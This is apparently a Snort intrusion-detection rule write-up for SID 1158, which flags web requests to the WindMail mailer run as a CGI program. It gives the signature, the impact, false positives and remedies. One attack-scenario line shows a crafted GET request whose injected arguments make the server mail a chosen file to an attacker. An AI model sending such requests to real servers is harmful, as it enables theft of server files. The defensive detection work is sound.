Rule:  
web-misc.rules:alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS 80 (msg:"WEB-MISC windmail access"; flags:A+; uricontent:"/windmail.exe"; nocase; content:"-n"; content:"mail"; nocase; reference:cve,CAN-2000-0242; reference:bugtraq,1073; reference:arachnids,465; classtype:attempted-recon; sid:1158; rev:2;

--

Sid:
1158

--

Summary:
Someone attempted to access the WindMail commandline mailer over the web

--
Impact:
Remote attackers could subvert the WindMail mailer to read or execute
arbitrary files on the web server

--
Detailed Information:
WindMail is a commandline mail program for Windows.  It is sometimes
deployed for scripting or for sending email through a web application.
Some windmail deployments make webmail.exe a CGI application, which it was
not designed to do.  The result is that an attacker could read or
execute arbitrary files on the system that the web server has access to.
It should never be a CGI application itself, and instead should be called
by another program that properly filters input.

--
Attack Scenarios:
http://target/cgi-bin/windmail.exe?%20-n%20desired.file%20attacker_email_address

--
Ease of Attack:
Simple crafting of a web GET request

--
False Positives:
Users browsing for WindMail or security information on the web

--
False Negatives:
If a CGI script calls windmail.exe, but windmail.exe itself is not a CGI
application, then this signature is unlikely to notice anything.  If the
CGI application does not properly filter input, there is a possibility
that the attack could still succeed.

--
Corrective Action:
Look at the packet to determine whether a request was made via an HTTP GET
for the windmail.exe application.  If so, determine whether the attacked
web server had windmail.exe on it.

--
Contributors:

--
Additional References:
CVE:  CAN-2000-0242
Bugtraq:  BID 1073
Arachnids:  465
